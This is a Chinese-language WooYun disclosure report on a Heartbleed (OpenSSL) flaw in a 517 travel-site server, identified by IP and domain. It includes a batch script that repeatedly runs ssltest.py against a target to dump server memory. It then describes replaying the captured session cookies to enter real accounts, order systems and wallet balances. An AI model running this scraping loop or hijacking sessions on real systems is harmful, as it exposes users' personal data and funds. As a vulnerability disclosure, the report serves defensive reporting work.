WooYun.org

在寻找517旅行网IP段时发现很多517网站打开了80,443,8080端口，由此特意检测了OpenSSL漏洞。
结果，在某C段发现了一台机器。

59.151.11.79

以前也有过监控Openssl的想法，并且尝试过写一个批处理调用ssltest.py,然后前几天就看到zone里的帖子（http://zone.wooyun.org/content/21272），报着实践的心态，就深入了一下。
然而并不会写python，于是还是采用手动检测的方法。各位大牛误笑。

调用ssltest.py的批处理脚本
@echo off 
set /p url=url:
echo -------------------------------------------------- 
echo -------------正在执行心脏出血监控脚本------------- 
echo -------------------------------------------------- 
cd C:\Python26
for /l %%d in (1 1 100000) do for /f "tokens=1-3 delims=- " %%a in ("%date%") do for /f "tokens=1-4 delims=:." %%i in ("%time%") do cmd /c "ping -n 1 -w 1000 1.0.0.1 | ssltest1.py %url% >> C:\Python26\heartbleed\%url%_%%a%%b%%c_%%i%%j%%k%%l.txt| echo 已执行%%d次 "
pause 
我的python装在了C:\Python26目录下，让抓取结果输出到C:\Python26\heartbleed\目录下，以url_日期_时间.txt命令

抓取了10分钟，然而并没有抓取到可用的账号密码，
在抓取的内容中发现了一下url，尝试访问。

付过款的订单没有什么太大的价值啊，继续寻找，抓取到了一些cookie，于是尝试登陆。

成功登陆

查看了一下，能够接触到很多东西。

这是这个大客户经理可以接触到的用户信息。

可以查询平台报表。

账户余额5000多元。

近期交易记录。
查看wooyun历史提交漏洞，对 WooYun: 517某处设计不当从而爆破用户密码影影响多系统各种订单个人敏感信息等（成功账户案例） 中出现的域名一一进行尝试，可以进入很多系统。

报表系统

订单查询系统

客票变更系统
为了证明不是偶然泄露cookie或只泄露个人cookie，又抓取了一次数据，再次测试登录。

账户余额2W多。。。
最后检测的时候发现，yc.517na.com这个站点也存在Openssl漏洞，经过判断，此域名就对应着上面的ip：59.151.11.79，由于yc.517na.com这个站点是517钱包，所以抓取到的cookie金额都很大。
综上所述，会影响到用户的资金安全，同时利用cookie登陆上账户之后，用户手上的订单信息，用户信息也会泄露。
同时发现一个小问题，这个站的80端口并没有禁止目录浏览。